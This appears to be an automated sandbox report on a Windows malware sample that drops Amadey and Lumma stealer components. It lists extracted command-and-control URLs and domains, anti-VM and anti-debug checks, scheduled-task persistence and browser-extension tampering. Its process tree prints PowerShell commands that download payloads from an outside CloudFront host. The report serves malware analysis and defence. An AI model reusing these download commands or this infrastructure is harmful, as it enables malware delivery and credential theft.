Analysis
-
max time kernel
143s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 18:50
Static task
static1
Behavioral task
behavioral1
Sample
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Resource
win10v2004-20240426-en
General
-
Target
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
-
Size
1.8MB
-
MD5
f6986f363dde0d5f374abd0a1dac252b
-
SHA1
4665c53ed2ce6bd84572fc398967d11421e00bab
-
SHA256
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
-
SHA512
733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
-
SSDEEP
49152:Cl/8HKuLWFBWcz/WrNKnun+YrhLOvn7e:8gLWnWczeNZn1VOf7
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
lumma
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://employhabragaomlsp.shop/api
https://stalfbaclcalorieeis.shop/api
https://civilianurinedtsraov.shop/api
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
axplons.exeaxplons.exe3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 64 3000 powershell.exe 69 3000 powershell.exe 81 4548 powershell.exe 84 4548 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplons.exe3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeaxplons.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeNewoff.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation axplons.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation Newoff.exe -
Executes dropped EXE 10 IoCs
Processes:
axplons.exeNewoff.exevpn-1002.exelumma1234.exei0.exei0.tmpaxplons.exeNewoff.exeaxplons.exeNewoff.exepid Process 3112 axplons.exe 2896 Newoff.exe 2040 vpn-1002.exe 3680 lumma1234.exe 3672 i0.exe 5076 i0.tmp 2260 axplons.exe 1160 Newoff.exe 4748 axplons.exe 3028 Newoff.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeaxplons.exeaxplons.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine axplons.exe -
Loads dropped DLL 1 IoCs
Processes:
vpn-1002.exepid Process 2040 vpn-1002.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 87 checkip.amazonaws.com 88 checkip.amazonaws.com -
Drops file in System32 directory 1 IoCs
Processes:
i0.tmpdescription ioc Process File created C:\Windows\system32\shlwapi_p.dll i0.tmp -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeaxplons.exeaxplons.exepid Process 3740 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 3112 axplons.exe 2260 axplons.exe 4748 axplons.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lumma1234.exedescription pid Process procid_target PID 3680 set thread context of 1436 3680 lumma1234.exe 99 -
Drops file in Program Files directory 15 IoCs
Processes:
i0.tmpchrome.exedescription ioc Process File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp File opened for modification C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\scoped_dir4984_1382533742\extension.zip chrome.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml i0.tmp File created C:\Program Files\Online Security\is-JCPNV.tmp i0.tmp File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Online Security\unins000.dat i0.tmp -
Drops file in Windows directory 1 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exedescription ioc Process File created C:\Windows\Tasks\axplons.job 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe -
Processes:
powershell.exepowershell.exepowershell.exepid Process 3000 powershell.exe 4548 powershell.exe 4916 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 4032 taskkill.exe 2824 taskkill.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 77 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 88 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 91 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exepowershell.exepowershell.exepowershell.exeaxplons.exeaxplons.exepid Process 3740 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 3740 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 3112 axplons.exe 3112 axplons.exe 4916 powershell.exe 4916 powershell.exe 4916 powershell.exe 3000 powershell.exe 3000 powershell.exe 3000 powershell.exe 4548 powershell.exe 4548 powershell.exe 4548 powershell.exe 2260 axplons.exe 2260 axplons.exe 4748 axplons.exe 4748 axplons.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exedescription pid Process Token: SeDebugPrivilege 4916 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 4032 taskkill.exe Token: SeDebugPrivilege 2824 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
i0.tmppid Process 5076 i0.tmp -
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeNewoff.exelumma1234.exevpn-1002.execmd.exei0.exei0.tmpcmd.exechrome.exedescription pid Process procid_target PID 3740 wrote to memory of 3112 3740 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 85 PID 3740 wrote to memory of 3112 3740 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 85 PID 3740 wrote to memory of 3112 3740 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 85 PID 3112 wrote to memory of 2896 3112 axplons.exe 93 PID 3112 wrote to memory of 2896 3112 axplons.exe 93 PID 3112 wrote to memory of 2896 3112 axplons.exe 93 PID 2896 wrote to memory of 3768 2896 Newoff.exe 94 PID 2896 wrote to memory of 3768 2896 Newoff.exe 94 PID 2896 wrote to memory of 3768 2896 Newoff.exe 94 PID 2896 wrote to memory of 2040 2896 Newoff.exe 96 PID 2896 wrote to memory of 2040 2896 Newoff.exe 96 PID 2896 wrote to memory of 2040 2896 Newoff.exe 96 PID 3112 wrote to memory of 3680 3112 axplons.exe 97 PID 3112 wrote to memory of 3680 3112 axplons.exe 97 PID 3112 wrote to memory of 3680 3112 axplons.exe 97 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 3680 wrote to memory of 1436 3680 lumma1234.exe 99 PID 2040 wrote to memory of 2876 2040 vpn-1002.exe 100 PID 2040 wrote to memory of 2876 2040 vpn-1002.exe 100 PID 2040 wrote to memory of 2876 2040 vpn-1002.exe 100 PID 2876 wrote to memory of 4916 2876 cmd.exe 102 PID 2876 wrote to memory of 4916 2876 cmd.exe 102 PID 2876 wrote to memory of 4916 2876 cmd.exe 102 PID 2876 wrote to memory of 3000 2876 cmd.exe 104 PID 2876 wrote to memory of 3000 2876 cmd.exe 104 PID 2876 wrote to memory of 3000 2876 cmd.exe 104 PID 2876 wrote to memory of 3672 2876 cmd.exe 107 PID 2876 wrote to memory of 3672 2876 cmd.exe 107 PID 2876 wrote to memory of 3672 2876 cmd.exe 107 PID 2876 wrote to memory of 4548 2876 cmd.exe 108 PID 2876 wrote to memory of 4548 2876 cmd.exe 108 PID 2876 wrote to memory of 4548 2876 cmd.exe 108 PID 3672 wrote to memory of 5076 3672 i0.exe 109 PID 3672 wrote to memory of 5076 3672 i0.exe 109 PID 3672 wrote to memory of 5076 3672 i0.exe 109 PID 5076 wrote to memory of 1204 5076 i0.tmp 110 PID 5076 wrote to memory of 1204 5076 i0.tmp 110 PID 1204 wrote to memory of 4984 1204 cmd.exe 112 PID 1204 wrote to memory of 4984 1204 cmd.exe 112 PID 4984 wrote to memory of 4916 4984 chrome.exe 113 PID 4984 wrote to memory of 4916 4984 chrome.exe 113 PID 5076 wrote to memory of 3592 5076 i0.tmp 114 PID 5076 wrote to memory of 3592 5076 i0.tmp 114 PID 5076 wrote to memory of 3964 5076 i0.tmp 116 PID 5076 wrote to memory of 3964 5076 i0.tmp 116 PID 5076 wrote to memory of 4032 5076 i0.tmp 118 PID 5076 wrote to memory of 4032 5076 i0.tmp 118 PID 5076 wrote to memory of 2824 5076 i0.tmp 120 PID 5076 wrote to memory of 2824 5076 i0.tmp 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F4⤵
- Creates scheduled task(s)
PID:3768
-
-
C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\abc.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10006⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp" /SL5="$130042,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10007⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""8⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti9⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffd3f3dab58,0x7ffd3f3dab68,0x7ffd3f3dab7810⤵PID:4916
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\xbweti.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""8⤵PID:3592
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\dhglhc > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""8⤵PID:3964
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:1436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
PID:1160
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4748
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
PID:3028
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD558b91f03dfc4cf14af464d97ede94660
SHA1ee65d8bbed1a2599db87825126549af9bb905e98
SHA256609b4f96bd072252827a12871f585426d219fb7e51430e339fcee44ef3e2f74f
SHA512b942f447ffb08149711def4281e87f5a9234271a6e2b198802f1560cbea4385e72e593bbdabc4e984f2bf520b55a28be03250f3668a0f8b00229000cf44965c9
-
Filesize
16KB
MD53081bd6181939301db545828ec689f19
SHA179c197e0c874f76999589e7f670cfbf4449140d3
SHA25640e70d07d34f7e65cf9d8035bd0e575fd526e4f7d8765bfdebbfcd5143b089a6
SHA512bc784dbeb23c34f4aebf99f2654e8db7c53689f5c903830ed9aad5e905884a7f882c9b1ffafb5683180a096897db2e0c8be9a0b122929788227492006dbf4756
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
Filesize
49KB
MD5ccb630a81a660920182d1c74b8db7519
SHA17bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA5128fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811
-
Filesize
1.8MB
MD5f6986f363dde0d5f374abd0a1dac252b
SHA14665c53ed2ce6bd84572fc398967d11421e00bab
SHA2563a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD5b80362872ea704846e892f16aab924c3
SHA1222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5
-
Filesize
47KB
MD552311257a997455c0a32e1679e0b614e
SHA1395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA25650a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA51219488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0
-
Filesize
208B
MD5963fb7657217be957d7d4732d892e55c
SHA1593578a69d1044a896eb8ec2da856e94d359ef6b
SHA2561d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd
-
Filesize
43KB
MD511a38af0ad330d95d2fb709612a44fa5
SHA1bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA2560d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA5124bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9
-
Filesize
48KB
MD54cac70c3fdb075424b58b220b4835c09
SHA1651e43187c41994fd8f58f11d8011c4064388c89
SHA2564094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963
-
Filesize
49KB
MD5931e9d91cc7969c1dcc0529135556b2f
SHA155c8efcf98411783fc351957cefbd3228882e99d
SHA2560f9c5676c1f2db6aa3cbd378bef4719c7c86fce24200aa4d92ba6298291cf8a9
SHA5129d1a0680c2c7a14169d896b7ce267ef3f67db79d897df1df3f5b06ab42e3addd7b013a5f0c5285d6aa816fa3c2644dc64c0f72e442c74ac7f1e24ae500685a15
-
Filesize
1KB
MD5261f4bbd673d2fabfcdc46bc6d3ed476
SHA1ef4dcdf1d1a7b34ac6150eba577f359adec3cd38
SHA2565116e02d1641a0d9c6faed1161c81befb05d8bc0d99f7854b237b3cd4761a5ea
SHA5122d3550dee24cdf756a05083be3fec627089f7e5e4bc6ff9e304a82d03392a57f588fe5cd9cf2c51e6982e1ac199a1d61044b837db333ed01944f9e0b365affce
-
Filesize
8KB
MD5d57a101cf48bd00b5297596c081ece42
SHA147be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA5127110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5
-
Filesize
3KB
MD5ca00972a17d51a3e6a28cfc8711474e4
SHA1c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA5129731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516
-
Filesize
108KB
MD5432c4c1300ba1c077fbd681f9667a104
SHA133482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA5120ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad
-
Filesize
438B
MD51d47eb945d1299c0e53bcada476d32b3
SHA1509f9041f7e2a14402915feb4f2a739cfac5636b
SHA2560a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
